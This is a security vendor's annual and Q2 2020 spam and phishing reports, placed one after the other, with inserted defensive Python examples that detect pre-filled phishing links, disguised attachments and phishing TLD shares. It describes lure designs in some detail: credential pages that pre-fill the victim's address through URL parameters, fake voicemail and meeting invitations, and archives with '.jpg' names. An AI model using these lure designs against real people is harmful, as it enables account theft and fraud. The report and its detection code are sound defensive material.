Theft of work accounts and infection of office computers with malware in targeted attacks were the main risks that companies faced this year. Messages that imitated business email or notifications from major services offered to view a linked document or attached HTML page. Viewing the file required entering the password to the recipient’s corporate email account.

Reasons given for asking users to open a link or attachment could be varied: a need to install an update, unread mail, quarantined mail or unread chat messages. The cybercriminals created web pages that were designed to look like they belonged to the company under attack. URL parameters including the corporate email address were pushed to the fake page with the help of JavaScript. This resulted in the user seeing a unique page with a pre-entered email address and a design generated to imitate the company’s corporate style. The appearance of that page could lull the potential victim into a false sense of security, as all they needed to do was enter their password.
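A link whose query string or fragment carries the recipient's email address is the visible trace of the pre-filled pages described above: the address has to travel in the URL for the page's script to insert it. The check below is an added example written for this report, not Kaspersky code; the sample links are constructed. It inspects the path, each query value and the fragment, and also tries a base64 decode of each piece, which is an assumption about how an address may be wrapped rather than something the report states. The fragment matters because it is never sent to the server, so only the page's JavaScript ever sees it and proxy logs will not show it.

```python
"""Flag links that carry an e-mail address in the URL (added example, not Kaspersky code)."""
import base64
import re
from urllib.parse import parse_qsl, unquote, urlsplit

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def _base64_text(value: str) -> str:
    """Decode a piece that looks like base64 into text; return '' if it is not."""
    candidate = value.strip()
    if len(candidate) < 8 or not re.fullmatch(r"[A-Za-z0-9+/=_-]+", candidate):
        return ""
    try:
        padded = candidate + "=" * (-len(candidate) % 4)
        return base64.urlsafe_b64decode(padded).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return ""


def embedded_emails(url: str) -> list[str]:
    """Return every e-mail address found in the path, query values or fragment."""
    parts = urlsplit(url)
    pieces = [unquote(parts.path)]
    pieces += [value for _, value in parse_qsl(parts.query, keep_blank_values=True)]
    pieces.append(unquote(parts.fragment))
    found = set()
    for piece in pieces:
        found.update(EMAIL_RE.findall(piece))
        found.update(EMAIL_RE.findall(_base64_text(piece)))  # assumption: base64-wrapped address
    return sorted(found)


# Constructed sample links (not from real campaigns).
PREFILLED = "https://files.example.net/view?user=alice%40corp.example"
FRAGMENT = "https://docs.example.net/index.html#" + base64.b64encode(b"alice@corp.example").decode()
BENIGN = "https://www.example.org/news?id=42"

if __name__ == "__main__":
    for link in (PREFILLED, FRAGMENT, BENIGN):
        print(link, "->", embedded_emails(link) or "none")
```

Run over a mail gateway's extracted links, a non-empty result on a link pointing outside the organisation's own domains is a strong candidate for quarantine, because legitimate document-sharing links do not normally need the recipient's address in the URL.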

In this type of attack, scammers began to make broader use of “voice messaging”. The appearance of the messages imitated business email.

The link could lead directly to a phishing site, but there also was a more complex scenario, in which the linked page looked like an audio player. When the recipient tried playing the file, they were asked to enter the credentials for their corporate mailbox.

Demand for online videoconferencing amid remote work led to a surge in fake online meeting invitations. A significant distinctive feature, which should have alarmed the recipients of the fake invitations, were the details that the page was asking them to enter in order to join the meeting. To access a real Zoom meeting, you need to know the meeting ID and password. The fake videoconference links opened fake Microsoft and WeTransfer pages, which contained fields for entering the login and password for a work account.

Messengers targeted

Scammers who were spreading their chain mail via social networks and instant messaging applications began to favor the latter. Message recipients, mostly in WhatsApp, were promised a discount or prize if they opened a link sent to them. The phishing web page contained a tempting message about a money prize, award or other, equally desirable, surprises.

The recipient had to fulfill two conditions: answer a few simple questions or fill out a questionnaire, and forward the message to a certain number of their contacts. Thus, the victim turned into a link in the spam chain, while subsequent messages were sent from a trusted address, thus avoiding anti-spam filters.

Besides that, a message from someone that the recipient knew would have much more credibility. Thus, the chain continued to grow, and the scammers went on enriching themselves. After all, even if the victim did fulfill the conditions, getting that promised prize proved not so simple, as the “lucky” recipient was urged to pay bank commission.

COVID-19

“Public relief” by spammers

Many governments did their best to help citizens during the pandemic. That initiative, together with the fact that people on the whole were willing to get payouts, became a theme for spam campaigns. Both individuals and companies were exposed to the risk of being affected by cybercriminals’ schemes.

Messages offering financial aid to businesses hurt by the pandemic or to underprivileged groups could crop up in social media feeds or arrive through instant messaging networks. The main requirement for getting the funds was filling out a detailed personal questionnaire. Those who took the step found that a small commission was required as well. Real government payouts these days are made through public portals that also serve other purposes and do not require additional registration, questionnaires or commissions.

Cybercriminals who offered tax deductions to companies employed a similar scheme. As in the examples above, the reason provided for the easing of tax policy was the pandemic, and in particular, anticipation of a second wave of COVID-19.

However, offers of tax deductions and compensations were hiding not just the danger of losing money but losing one’s account to the scammers, too, as many of the messages contained phishing links.

Email campaigns that promised compensation could also threaten computer security. Messages in Turkish, just as those mentioned earlier, offered a payout from Turkey’s Ministry of Health – not always mentioned by name – but getting the money required downloading and installing an APK file on the recipient’s smartphone. The attack was targeting Android users, and the downloadable application contained a copy of the Trojan-Dropper.AndroidOS.Hqwar.cf.

A fear of being infected with a new virus and a desire to know as much as possible about it could prompt recipients to review the email and open the links that it contained, as long as the message had been sent by a well-known organization. Fake letters from the WHO purporting to contain the latest safety advice were distributed in a variety of languages. The attachment contained files with various extensions. When the recipient tried to open these, malware was loaded onto the computer. In the message written in English, the attackers spread the Backdoor.Win32.Androm.tvmf, and in the one written in Italian, the Trojan-Downloader.MSOffice.Agent.gen.

Viral postal services

COVID-19 was also mentioned in fake email messages that mimicked notifications from delivery services. The sender said that there was a problem with delivering an order due to the pandemic, so the recipient needed to print out the attachment and take it to the nearest DHL office. The attached file contained a copy of the HEUR:Trojan.Java.Agent.gen.

The corporate sector

Spam that targeted companies also exploited the COVID-19 theme, but the cybercriminals occasionally relied on different kinds of tricks. For example, one of the emails stated that technical support had created a special alert system to minimize the risk of a new virus infection. All employees were required to log in to this system using their corporate account credentials and review their schedules and tasks. The link opened a phishing page disguised as the Outlook web interface.

In another instance, scammers were sending copies of the HEUR:Trojan-PSW.MSIL.Agensla.gen in the form of an email attachment. The scammers explained that the recipient needed to open the attached file, because the previous employee, who was supposed to send the “documentation”, had quit over COVID-19, and the papers had to be processed within three days.

“Nigerian” crooks making money from the pandemic

Email from “Nigerian” scammers and fake notifications of surprise lottery winnings regularly tapped the pandemic theme. The message in Korean shown below says that the recipient’s email address had been selected randomly by some center in Istanbul for a coronavirus-related emergency payout. Such surprise notices of winnings and compensations were generally sent out in a variety of languages. Messages from some lucky individuals who had won a huge sum and wished to support their fellow creatures in the difficult times of the pandemic were another variation on the “Nigerian” scam.

Where messages were signed as being from a lawyer trying to find a new owner for no-man’s capital, the sender emphasized that the late owner of the fortune had died of COVID-19.

An unusual turn of events

Regular “Nigerian” scam email is easy to recognize: it talks about millionaires or their relatives trying to inherit a huge fortune or bequeath it to someone who bears the same last name. The public seems to have become so accustomed to that type of junk mail that it has ceased to react, so cybercriminals have come up with a new cover story. To avoid being found out right away, they refrain from mentioning astronomical sums of money, instead posing as a mother from Russia who is asking for help with her daughter’s effort to collect postcards from around the world. The key point of this kind of message is to get the potential victim to reply: the “mother’s” request sounds absolutely innocent and easy to do, so it can resonate with recipients. If the victim agrees to send a postcard, they are in for a lengthy email exchange with the scammers, who will offer them a share of a large sum of money in exchange for a small upfront fee.

“Nigerian” scammers are not the only ones that have been getting creative. Spammers who sent out their messages through website feedback forms employed yet another unusual trick. The messages were signed as being from an outraged graphic artist or photographer, their names changing with each new message. The sender insisted that the website contained their works and thus violated their copyright, and demanded that the content be taken down immediately, threatening legal action.

The deadline for meeting the demand was quite tight, as the scammers needed the victim to open the link as soon as possible, while pondering on the consequences of that action as little as possible. A law-abiding site owner was likely to do just that. This is confirmed by related discussions in various blogs, with the users reporting that they immediately tried checking what photographs they had “stolen”. The links were not functional at the time the “complaints” were discovered, but in all likelihood, they had previously linked to malicious files or phishing programs.

Statistics: spam

Proportion of spam in email traffic

The share of spam in global email traffic in 2020 was down by 6.14 p.p. when compared to the previous reporting period, averaging 50.37%.

Proportion of spam in global email traffic, 2020

The percentage of junk mail gradually decreased over the year, with the highest figure (55.76%) recorded in January and the lowest (46.83%), in December. This may be due to the universal transition to remote work and a resulting increase in legitimate email traffic.

Sources of spam by country

The group of ten countries where the largest volumes of spam originated went through noticeable change in 2020. The United States and China, which had shared first and second places (10.47% and 6.21%, respectively) in the previous three years, dropped to third and fourth. The “leader” was Russia, which was the source of 21.27% of all spam email in 2020. It was followed by Germany (10.97%), which was just 0.5 p.p. ahead of the United States.

Sources of spam by country in 2020

France gained 2.97 p.p. as compared to 2019, remaining fifth with 5.97%, while Brazil lost 1.76 p.p. and sank to seventh place with 3.26%. The other countries in last year’s “top ten”, India, Vietnam, Turkey and Singapore, dropped out, giving way to the Netherlands (4.00%), which jumped to sixth place, Spain (2.66%), Japan (2.14%) and Poland (2.05%).

Malicious email attachments

Attacks blocked by the email antivirus in 2020

In 2020, our solutions detected 184,435,643 dangerous email attachments. The peak in malicious activity, 18,846,878 email attacks blocked, came in March, while December was the quietest month, with 11,971,944 malicious attachments, as it had been in 2019.

Malware families

TOP 10 malware families in 2020

Members of the Trojan.Win32.Agentb family were the most frequent (7.75%) malware spread by spammers. The family includes backdoors, capable of disrupting the functioning of a computer, and copying, modifying, locking or deleting data. The Trojan-PSW.MSIL.Agensla family was second with 7.70%. It includes malware that steals data stored by the browser, as well as credentials for FTP and email accounts.

Equation Editor vulnerability exploits, Exploit.MSOffice.CVE-2017-11882, dropped to third place with 6.55 percent. This family had topped the ranking of malware spread through spam in the previous two years.

Trojan.MSOffice.SAgent malicious documents dropped from second to fourth place with 3.41%. These contain a VBA script, which runs PowerShell to download other malware secretly.

In fifth place, with 2.66%, were Backdoor.Win32.Androm modular backdoors, which, too, are frequently utilized for delivering other malware to an infected system. These were followed by the Trojan.Win32.Badun family, with 2.34%. The Worm.Win32.WBVB worms, with 2.16%, were seventh. Two families, in eighth and ninth place, contain malware that carefully evades detection and analysis: Trojan.Win32.Kryptik trojans, with 2.02%, use obfuscation, anti-emulation and anti-debugging techniques, while Trojan.MSIL.Crypt trojans, with 1.91%, are heavily obfuscated or encrypted. The Trojan.Win32.ISO family, with 1.53%, rounds out the rankings.

TOP 10 malicious email attachments in 2020

The rankings of malicious attachments largely resemble those of malware families, but there are several subtle differences. For instance, our solutions detected the exploit that targeted the CVE-2017-11882 vulnerability more frequently (6.53%) than the most common member of the Agensla family (6.47%). The WBVB worm, with 1.93%, and the Kryptik trojan, with 1.97%, switched positions, too. Androm-family backdoors missed the “top ten” entirely, but the Trojan-Spy.MSIL.Noon.gen, with 1.36%, which was not represented in the families rankings, was tenth.

Countries targeted by malicious mailshots

Spain was the main target for malicious email campaigns in 2020, its share increasing by 5.03 p.p. to reach 8.48%. As a result of this, Germany, which had topped the rankings since 2015, dropped to second place with 7.28% and Russia, with 6.29%, to third.

Countries targeted by malicious mailshots in 2020

Italy’s share (5.45%) fell slightly, but that country remained in fourth place. Vietnam, which had previously rounded out the top three, dropped to fifth place with 5.20%, and the United Arab Emirates, with 4.46%, to sixth. Mexico, with 3.34%, rose from ninth to seventh place, followed by Brazil, with 3.33%. Turkey, with 2.91%, and Malaysia, with 2.46%, rounded out the rankings, while India, 2.34%, landed in eleventh place last year.

Statistics: phishing

In 2020, Anti-Phishing was able to block 434,898,635 attempts at redirecting users to phishing web pages. That is 32,289,484 fewer attempts than in 2019. A total of 13.21% of Kaspersky users were attacked worldwide, with 6,700,797 masks describing new phishing websites added to the system database.

Attack geography

In 2020, Brazil regained its leadership by number of Anti-Phishing detections, with 19.94% of users trying to open phishing links at least once.

Geography of phishing attacks in 2020

TOP 10 countries by number of attacked users

The countries with the largest numbers of attempts at opening phishing websites in 2018 “topped the rankings” again in 2020: Brazil, with 19.94%, in first place, and Portugal, with 19.73%, in second place. Both countries’ indicators dropped markedly from 2019, Brazil “losing” 10.32 p.p. and Portugal, 5.9 p.p. France, which had not been seen among the ten “leaders” since 2015, was in third place with 17.90%.

Venezuela, last year’s “leader”, had the largest numbers in the first two quarters of 2020, but came out eighth overall, the share of attacked users in that country decreasing by 14.32 p.p. to 16.84%.

Country Share of attacked users (%)*
Brazil 19.94
Portugal 19.73
France 17.90
Tunisia 17.62
French Guiana 17.60
Qatar 17.35
Cameroon 17.32
Venezuela 16.84
Nepal 16.72
Australia 16.59

* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2020

Top-level domains

Most scam websites, 24.36% of the total number, had a .com domain name extension last year. Websites with a .ru extension were 22.24 p.p. behind with 2.12%. All other top-level domains in the “top ten” are various country-code TLDs: the Brazilian .com.br with 1.31% in third place, with Germany’s .de, (1.23%), and Great Britain’s .co.uk (1.20%) in fourth and fifth places, respectively. In sixth place was the Indian domain extension .in, with 1.10%, followed by France’s .fr with 1.08%, and Italy’s .it with 1.06%. Rounding out the rankings were the Dutch .nl, with 1.03%, and the Australian .com.au, with 1.02%.

Most frequent top-level domains for phishing pages in 2020 (download)

Organizations under attack

The rating of attacks by phishers on different organizations is based on detections by Kaspersky Lab’s Anti-Phishing deterministic component. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

Last year’s events affected the distribution of phishing attacks across the categories of targeted organizations. The three largest categories had remained unchanged for several years: banks, payment systems and global Internet portals. The year 2020 brought change. Online stores became the largest category with 18.12%, which may be linked to a growth in online orders due to pandemic-related restrictions. Global Internet portals remained the second-largest category at 15.94%, but their share dropped by 5.18 p.p. as compared to 2019, and banks were third with a “modest” 10.72%.

Online games and government and taxes dropped out of the “top ten” in 2020. They were replaced by delivery companies and financial services.

Distribution of organizations targeted by phishers, by category in 2020 (download)

Conclusion

With its pandemic and mass transition to remote work and online communication, last year was an unusual one, which was reflected in spam statistics. Attackers exploited the COVID-19 theme, invited victims to non-existent video conferences and insisted that their targets register with “new corporate services”. Given that the fight against the pandemic is not over yet, we can assume that the main trends of 2020 will stay relevant into the near future.

The general growing trend of targeted attacks on the corporate sector will continue into next year, all the more so because the remote work mode, increasingly popular, makes employees more vulnerable. Users of instant messaging networks should raise their guard, as the amount of spam and phishing messages received by their mobile devices is likely to grow as well. Besides, the number of email messages and schemes exploiting the COVID-19 theme one way or another has a high likelihood of rising.

Spam and phishing in Q2 2020 (https://securelist.com/spam-and-phishing-in-q2-2020/97987/), Fri, 07 Aug 2020

Quarterly highlights

Targeted attacks

The second quarter often saw phishers resort to targeted attacks, especially against fairly small companies. To attract attention, scammers imitated email messages and websites of companies whose products or services their potential victims could be using.

The scammers did not try to make any of the website elements appear credible as they created the fake. The login form is the only exception. One of the phishing websites we discovered even used a real captcha on that form.

The main pretext that scammers use to prompt the target to enter their information is offering an online catalog that purportedly only becomes available once the target provides the login and password to their email account.

In one instance, phishers used Microsoft Sway, the service for creating and sharing presentations, to hunt for logins and passwords for corporate accounts. The user was invited to view presentations belonging to another company in the same industry by following a link and entering the login and password for their work email account.

A fake website can be recognized by its design. The workmanship is often rough, and the chunks of information on the various pages are disjointed due to being pulled from diverse sources. Besides, pages like that are created on free hosting websites, as cybercriminals are not prepared to invest too much money in the fakes.

A targeted phishing attack may lead to serious consequences: after gaining access to an employee’s mailbox, cybercriminals can use it for further attacks on the company itself, or its employees or partners.

Waiting for your package: keeping your data secure and your computer, clean

As the pandemic reached its peak, mail service between countries became complicated and delivery times noticeably increased. Organizations responsible for delivery of letters and parcels rushed to notify recipients about all kinds of possible delays and hiccups. This is exactly the type of email message that scammers started to imitate: the target was invited to open the attachment to find out the address of the warehouse holding the package that had failed to reach them.

Another, relatively original, trick employed by cybercriminals was a message containing a miniature image of a postal receipt. The scammers expected the curious recipient to take the attachment, which was an ACE archive despite its name containing “jpg”, for the real thing and open it. The mailshots we detected used this as a method of spreading the Noon spyware. The scam can only be detected if the email client displays the full names of attachments.
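The decoy-extension trick described above can be checked mechanically on the receiving side rather than relying on the mail client showing the full name. The following Python is an added example, not code from the original report or from Kaspersky: it parses a constructed MIME message, compares each attachment's declared extension with what the file's leading bytes say it is, and flags names that carry an image or document extension in front of the real one. The magic-byte table (the ACE marker "**ACE**" at byte offset 7, plus ZIP, JPEG and PDF signatures) and the sample message are my own assumptions, constructed for the demonstration.

```python
import email
from email import policy
from email.message import EmailMessage

# Magic-byte signatures (assumed for this example). An ACE archive carries the
# marker "**ACE**" at byte offset 7; the other formats are identified at offset 0.
MAGIC = {
    "ace": (7, b"**ACE**"),
    "zip": (0, b"PK\x03\x04"),
    "jpg": (0, b"\xff\xd8\xff"),
    "pdf": (0, b"%PDF-"),
}

# Extensions a scammer places before the real one so an archive looks like a
# picture or document ("receipt.jpg.ace").
DECOY_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx", "txt"}


def sniff_type(data: bytes):
    """Return the format implied by the magic bytes, or None if unrecognised."""
    for kind, (offset, sig) in MAGIC.items():
        if data[offset:offset + len(sig)] == sig:
            return kind
    return None


def declared_extension(filename: str) -> str:
    """The last extension in the file name, lower-cased ('' if there is none)."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def has_decoy_extension(filename: str) -> bool:
    """True for names like receipt.jpg.ace: a decoy extension sits before the real one."""
    parts = filename.lower().split(".")
    return len(parts) > 2 and any(p in DECOY_EXTENSIONS for p in parts[1:-1])


def audit_attachments(raw: bytes):
    """Return (filename, sniffed_type, reasons) for every attachment in a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        actual = sniff_type(data)
        declared = declared_extension(name)
        reasons = []
        if has_decoy_extension(name):
            reasons.append("decoy extension in name")
        # Declared extension and sniffed format disagree (jpg/jpeg are the same thing).
        if actual and actual != declared and not (actual == "jpg" and declared == "jpeg"):
            reasons.append(f"content is {actual}, name says .{declared or '?'}")
        findings.append((name, actual, reasons))
    return findings


def build_sample() -> bytes:
    """A constructed message in the style the report describes: 'receipt' attachments."""
    msg = EmailMessage()
    msg["From"] = "courier@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Your postal receipt"
    msg.set_content("Your parcel is waiting. The receipt is attached.")
    fake_ace = b"\x00" * 7 + b"**ACE**" + b"\x00" * 24   # minimal ACE-looking header
    real_jpg = b"\xff\xd8\xff\xe0" + b"\x00" * 12         # minimal JPEG-looking header
    msg.add_attachment(fake_ace, maintype="image", subtype="jpeg", filename="receipt.jpg.ace")
    msg.add_attachment(fake_ace, maintype="image", subtype="jpeg", filename="receipt.jpg")
    msg.add_attachment(real_jpg, maintype="image", subtype="jpeg", filename="photo.jpg")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, kind, reasons in audit_attachments(build_sample()):
        print(f"{name:18} sniffed={str(kind):5} {'; '.join(reasons) or 'ok'}")
```

Both checks are needed: the first attachment is honest about its final extension but uses a decoy, the second has a clean-looking name and only the content check catches it. A gateway rule that quarantines on either finding does not depend on what the user's client chooses to display.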

In another fraudulent scheme, the target was told that their order could not be dispatched due to a restriction on mailing certain types of goods, but that processing of the package would resume once the restrictions were lifted. All required documents and a new tracking number could purportedly be found in the attached archive. In reality, the attachment contained a copy of the Androm backdoor, which opened remote access to the victim’s computer.

Scammers posing as courier service employees sent out emails warning that packages could not be delivered due to failure to pay for the shipping. The “couriers” accepted codes for prepaid cards issued by Paysafecard as payment. These cards range from €10 to €100 and can be used in stores that accept this payment method. The victim was asked to email a €50 card code – incidentally, an activity that the payment system’s rules explicitly forbid. The cybercriminals chose this payment method for a reason: blocking or revoking a Paysafecard payment is next to impossible.

Banking phishing amid a pandemic

Banking phishing attacks in the second quarter of the year often employed emails that offered borrowers various pandemic-related discounts and bonuses. Accessing the benefits involved downloading a file with a manual or following a link. As a result, the scammers could access the user’s computer, personal data or credentials for various services, depending on the scheme.

The COVID-19 theme was present, too, in the widely known fake bank emails informing customers that their accounts had been blocked, and that they needed to enter their login and password on a special page to get back their access.

The pandemic saw the revival of a more-than-a-decade-old scheme, in which scammers sent victims emails offering to open the attachment to get the details of a low-rate loan. This time, the rate reduction was linked to the pandemic.

Taxes and exemptions

The beginning of the second quarter is the time for submitting tax forms in many countries. This year, tax authorities in some countries reduced the tax burden or exempted citizens from paying taxes. Scammers naturally grabbed the opportunity: mailshots we detected reported that the government had approved a compensation payout, and claiming it involved following a link to the tax agency’s website, which, unsurprisingly, proved to be fake. Some of the email messages were not too well crafted, and looking closely at the From field was all it took to detect a fake.

More ingenious scammers made up a whole legend: in an email presented as being from the IRS (United States Internal Revenue Service), they said there was a $500,000 “pandemic payment”, authorized jointly by the UN and the World Bank, that could be transferred to the recipient if it had not been for a woman named Annie Morton. The lady, the email said, had showed up at an IRS office carrying a warrant for the payment. She purportedly said that the intended recipient had succumbed to COVID-19, and she was the one to receive the $500,000. The message insisted that the victim contact a certain IRS employee – and not any other, so as to avoid a mistake – to prove that they were alive.

Subsequent steps would most likely be identical to the well-known inheritance scam, where the victim would be offered to pay for the services of a lawyer, who would then disappear with the advance money. One might guess that instead of the advance, the scammers would ask for a fee for executing papers that would prove the victim was still alive.

Getting refunded and losing it all

Tax refunds are not the only type of aid that states have been providing to individuals and companies distressed by the pandemic. And not the only type the scammers have been using. Thus, Brazilians were “allowed” not to pay their energy bills, and all they had to do was register on a website by following a link in an “email from the government”. The hyperlink had an appearance designed to trick the user into thinking that they were being redirected to a government portal, whereas in reality, the victim had a trojan installed on their computer, which downloaded and then ran another trojan, Sneaky.

Personal information leak is another hazard faced by those who risk registering for “compensation” on a suspicious website. For example, one mailshot offered individuals aged over seventy to go to a website and fill out a form, which contained fields for the last name, first name, gender, mailing address and SSN (social security number, for US citizens).

Identifying a fake email is easy. One just needs to take a closer look at the From field and the subject, which appears odd for an official email.

Once the target filled out the entire form, they were redirected to the official Web page of the World Health Organization’s COVID-19 Solidarity Response Fund, a real organization, to give a donation. This helped the scammers to create an illusion that the questionnaire was official and to build a vast database containing the details of individuals over seventy years of age.

Fake emails promising government compensations carried one more threat: instead of getting paid, the victim risked losing their own money to the cybercriminals. Thus, a fake email from the International Monetary Fund announced that the recipient and sixty-four other “lucky” individuals had been selected to receive compensations from a five-hundred-million-dollar fund set up by the IMF, China and the European Union for supporting victims of the pandemic. Getting €950,000 was a matter of contacting the IMF office at the address stated in the message. Subsequent events followed the lottery-scam script: getting the money required paying a commission first.

Fake HR: getting dismissed by professional spammers

The pandemic-related economic downturns in several countries caused a surge in unemployment, an opportunity that cybercriminals were quick to take advantage of. One mailshot, sent in the name of the US Department of Labor, offered looking at the latest changes to the parental leave and sick leave laws. The sender said these laws had been amended following the adoption of the coronavirus relief act, and all details on the amendments were available in the attachment. What the attachment really contained was Trojan-Downloader.MSOffice.SLoad.gen, a trojan mostly used for downloading and installing ransomware.

Another way scammers “surprised” potential victims was dismissal notices. The employee was informed that the company had been forced to discharge them due to the pandemic-induced recession. The dismissal “followed the book”, in that the attachment, according to the author of the email, contained a request form for two months’ worth of pay. Needless to say, the victim only found malware attached.


Your data wanted, now

The share of voice phishing in email traffic rose noticeably at the end of Q2 2020. One mailshot warned of a suspicious attempt at logging in to the target’s Microsoft account, originating in another country, and recommended that the target contact support by phone at the supplied number. This spared the scammers the need to create a large number of fake pages, as they tried to get all the information they needed over the phone.

An even less conventional way of obtaining personal data could be found in emails that offered subscription to COVID-19 updates, where the target only needed to verify their email address. Besides personal data theft, forms like this can be used for collecting mailbox usage statistics.

Statistics: spam

Proportion of spam in email traffic

Proportion of spam in global email traffic, Q1 2020 – Q2 2020 (download)

In Q2 2020, the largest share of spam (51.45 percent) was recorded in April. The average percentage of spam in global email traffic was 50.18%, down by 4.43 percentage points from the previous reporting period.

Proportion of spam in Runet email traffic, Q1 2020 – Q2 2020 (download)

The Russian segment of the World Wide Web presents the opposite picture, with the end of the quarter accounting for the larger share of spam: spam peaked in June as it reached 51.23 percent. The quarterly average was 50.35 percent, 1.06 p.p. lower than the first quarter’s average.

Sources of spam by country

Countries where spam originated in Q2 2020 (download)

The composition of the top five Q1 2020 spam leaders remained unchanged in the second quarter. Russia kept the lead with 18.52 percent, followed by Germany with 11.94 percent, which had overtaken the US, now third with 10.65 percent. France (7.06 percent) and China (7.02 percent) remained fourth and fifth, respectively.

Sixth was the Netherlands (4.21 percent), closely followed by Brazil (2.91 percent), Turkey (2.89 percent), Spain (2.83 percent) and lastly, Japan (2.42 percent).

Spam email size

Spam email size, Q1 – Q2 2020 (download)

The share of extra small emails kept going down, dropping by 8.6 p.p. to 51.30 percent in Q2 2020. Emails between 5 KB and 10 KB decreased slightly (by 0.66 p.p.) compared to the previous quarter, to 4.90 percent. Meanwhile, the share of spam messages within the range of 10 KB to 20 KB rose by 4.73 p.p. to 11.09 percent. The share of larger messages between 100 KB and 200 KB in the second quarter fell by 1.99 p.p. to 2.51 percent compared to Q1 2020.

Malicious attachments: malware families

Number of Mail Anti-Virus triggerings, Q1 2020 – Q2 2020 (download)

Our security solutions detected a total of 43,028,445 malicious email attachments in Q2 2020, an increase of six and a half million year-on-year.

TOP 10 malicious attachments in mail traffic, Q2 2020 (download)

Trojan.Win32.Agentb.gen (13.27 percent) was the most widespread malware in email attachments in the second quarter of the year, followed by Trojan-PSW.MSIL.Agensla.gen (7.86 percent) in second place and Exploit.MSOffice.CVE-2017-11882.gen (7.64 percent) in third place.

TOP 10 malware families in mail traffic, Q2 2020 (download)

The most widespread malware family in the second quarter, as in the previous one, was Trojan.Win32.Agentb (13.33 percent), followed by Trojan-PSW.MSIL.Agensla (9.40 percent) and Exploit.MSOffice.CVE-2017-11882 (7.66 percent).

Countries targeted by malicious mailshots

Distribution of Mail Anti-Virus triggerings by country, Q2 2020 (download)

Spain (8.38%) took the lead in Mail Anti-Virus triggerings in Q2 2020, just as in Q1 2020. Second came Russia with 7.37 percent of attacks, and third came Germany with 7.00 percent.

Statistics: phishing

Kaspersky Anti-Phishing helped to prevent 106,337,531 attempts at redirecting users to phishing Web pages in Q2 2020, a figure that is almost thirteen million lower than that for the first quarter. The share of unique attacked users accounted for 8.26 percent of the total Kaspersky users in the world, with 1,694,705 phishing wildcards added to the system database.

Attack geography

Venezuela was traditionally the country with the largest share of users attacked by phishers (17.56 percent).

Geography of phishing attacks, Q2 2020 (download)

Portugal was 4.05 p.p. behind with 13.51 percent, closely followed by Tunisia with 13.12 percent.

Country %*
Venezuela 17.56%
Portugal 13.51%
Tunisia 13.12%
France 13.08%
Brazil 12.91%
Qatar 11.94%
Bahrain 11.88%
Guadeloupe 11.73%
Belgium 11.56%
Martinique 11.34%

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country

Top-level domains

Starting with this quarter, we have decided to maintain statistics on top-level domains used in phishing attacks. Quite predictably, COM led by a huge margin, with 43.56 percent of the total number of top-level domain names employed in attacks. It was followed by NET (3.96 percent) and TOP (3.26 percent). The Russia-specific RU domain took fourth place with 2.91 percent, followed by ORG with 2.55 percent.
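The 2020 annual ranking above (.com.br, .co.uk, .com.au alongside .com and .ru) and this quarter’s list both tabulate some country-code second-level suffixes as if they were top-level domains. The following Python is an added example, not code from the original report or from Kaspersky, showing how such a tally is built from a list of blocked URLs: it extracts the suffix a report of this kind would count, treats the multi-label suffixes separately, tolerates links written without a scheme, and skips IP-literal and bare hosts. The suffix set (a tiny stand-in for the Public Suffix List) and the sample URLs are constructed for the demonstration.

```python
from collections import Counter
from urllib.parse import urlsplit

# Constructed stand-in for the Public Suffix List: suffixes under which the
# registrable name sits one label deeper, so a host under example.com.br is
# counted as com.br rather than br. Extend from the real list in practice.
MULTI_LABEL_SUFFIXES = {"com.br", "co.uk", "com.au", "co.jp", "co.za"}


def hostname_of(url: str) -> str:
    """Hostname of a URL, tolerating links written without a scheme."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").rstrip(".").lower()


def effective_tld(url: str) -> str:
    """Suffix a phishing report would tabulate; '' for IPv4 literals and bare hosts."""
    host = hostname_of(url)
    labels = host.split(".")
    if len(labels) < 2 or all(part.isdigit() for part in labels):
        return ""
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-2:])
    return labels[-1]


def tld_shares(urls) -> dict:
    """Percentage share of each effective TLD among the URLs that have one."""
    counts = Counter(t for t in map(effective_tld, urls) if t)
    total = sum(counts.values())
    if not total:
        return {}
    return {t: round(100.0 * c / total, 2) for t, c in counts.most_common()}


# Constructed sample of blocked links (hosts in example/documentation space only).
SAMPLE_URLS = [
    "https://login.example.com/verify",
    "http://secure-update.example.com/",
    "https://parcel.example.com/track?id=1",
    "https://bank.example.com/",
    "example.com/reset",                      # no scheme, as often seen in messages
    "https://loja.example.com.br/oferta",
    "http://banco.example.com.br/",
    "https://delivery.example.co.uk/",
    "https://promo.example.ru/",
    "https://konto.example.de/",
    "http://192.0.2.10/login",                # IP literal: no TLD to count
    "http://localhost/",                      # bare host: no TLD to count
]

if __name__ == "__main__":
    for tld, share in tld_shares(SAMPLE_URLS).items():
        print(f"{tld:8} {share:6.2f}%")
```

Whether .com.br is counted as its own row or folded into .br is purely a choice of suffix list; the code makes that choice explicit so that two quarters’ figures can be compared on the same basis.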

Top-level domains most popular with phishers, Q2 2020 (download)

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by the Kaspersky Anti-Phishing component. This component detects pages with phishing content that the user tried to access, regardless of how the user got to the page: by clicking a link in a phishing email or in a message on a social network, or after being redirected by a malicious program. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

As in the first quarter, the Online Stores category accounted for the largest share of phishing attacks, its share increasing by 1.3 p.p. to 19.42 percent. Global Web Portals again received the second-largest share of attacks, virtually unchanged at 16.22 percent. Banks (11.61 percent) returned to third place, pushing Social Networks (10.08 percent) to fourth place.

Distribution of organizations subjected to phishing attacks by category, Q2 2020 (download)

Conclusion

